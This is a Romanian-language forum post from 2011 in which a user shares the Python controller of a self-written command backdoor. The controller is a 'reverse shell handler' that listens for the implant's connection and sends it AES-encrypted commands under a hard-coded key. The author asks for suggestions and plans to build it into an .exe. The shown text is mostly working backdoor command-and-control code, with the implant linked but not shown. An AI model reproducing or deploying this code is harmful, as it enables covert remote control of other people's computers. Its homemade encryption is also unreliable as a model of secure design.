[PY] "Netcat, cmd backdoor" sau remote cmd :-?

[BGS]

A fost gandit ca un simplu backdoor dar mai trebuie lucrat la el, este in stare functionala asa ca am hotarat sa vi-l arat si voua , sa va dati cu parerea la ce ar trebui imbunatatit adaugat etc .

Known bugs:

Daca dati dir de exemplu intr-un folder unde sunt multe fisiere controller-ul va va da eroarea : [WARNING] Checksum mismatch !!! .

Rezolvare ?

Trebuie sa impun o limita asupra fluxului de date trimise prin socket de la server catre controller.

Nu stiu daca va va fi de folos dar poate va va ajuta sa intelegeti cum functioneaza modelul client <-> server ( pe mine m-a ajutat mult ! ) si ma ajutat sa nu ma plictisesc prea tare in weekend .

controller:

Python code - 102 lines - codepad

app (server):

Python code - 148 lines - codepad

Mostra :

Controller:

import zlib
import struct
from Crypto.Cipher import AES
import argparse
import socket
import sys
import re


key = "s3cr3t0stuff0u0mad3bro?"


class CheckSumError(Exception):
    pass

def _lazysecret(secret, blocksize=32, padding='}'):
    """pads secret if not legal AES block size (16, 24, 32)"""
    if not len(secret) in (16, 24, 32):
        return secret + (blocksize - len(secret)) * padding
    return secret

def encrypt(plaintext, secret, lazy=True, checksum=True):
    """encrypt plaintext with secret
    plaintext   - content to encrypt
    secret      - secret to encrypt plaintext
    lazy        - pad secret if less than legal blocksize (default: True)
    checksum    - attach crc32 byte encoded (default: True)
    returns ciphertext
    """

    secret = _lazysecret(secret) if lazy else secret
    encobj = AES.new(secret, AES.MODE_CFB)

    if checksum:
        plaintext += struct.pack("i", zlib.crc32(plaintext))

    return encobj.encrypt(plaintext)

def decrypt(ciphertext, secret, lazy=True, checksum=True):
    """decrypt ciphertext with secret
    ciphertext  - encrypted content to decrypt
    secret      - secret to decrypt ciphertext
    lazy        - pad secret if less than legal blocksize (default: True)
    checksum    - verify crc32 byte encoded checksum (default: True)
    returns plaintext
    """

    secret = _lazysecret(secret) if lazy else secret
    encobj = AES.new(secret, AES.MODE_CFB)
    plaintext = encobj.decrypt(ciphertext)

    if checksum:
        crc, plaintext = (plaintext[-4:], plaintext[:-4])
        if not crc == struct.pack("i", zlib.crc32(plaintext)):
            raise CheckSumError("[WARNING] Checksum mismatch !!!")


    return plaintext


def main():
    desc = """Reverse shell handler: controller.exe -l ip port to listen for connections!"""
    parser = argparse.ArgumentParser(description=desc)
    parser.add_argument('ip', help='IP address for listening or connecting.')
    parser.add_argument('port', help='Port for listening or connecting.')
    group = parser.add_mutually_exclusive_group()
    group.add_argument('-l', action='store_true',
                                  help='Setup a listening server.')
    print '[INFO] Parsing arguments...'				  
    args = parser.parse_args()

    print '[INFO] Setting the socket...'
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    if args.l == True:
        print '[INFO] Binding on : %s:%s' %(args.ip, args.port)
        sock.bind((args.ip, int(args.port)))
        print '[INFO] Socket listening for connections...'
        sock.listen(5)
        print '[INFO] All set!'
        app_socket, app_ip = sock.accept()
        print '[INFO] Server attempting to connect! ' 

        while True:
            data = decrypt(app_socket.recv(1024), key)
            print data
            cmd = raw_input(">>>")

            if cmd == "exit":
                app_socket.send(encrypt("/close", key))
                sock.close()
                sys.exit(0)

            else:
                 app_socket.send(encrypt(cmd, key))     


if __name__ == '__main__':
    main()

Le: apare controller.exe la descriere fiindca intentioenz sa il fac ca exe cu py2exe xD .

Edited October 30, 2011 by BGS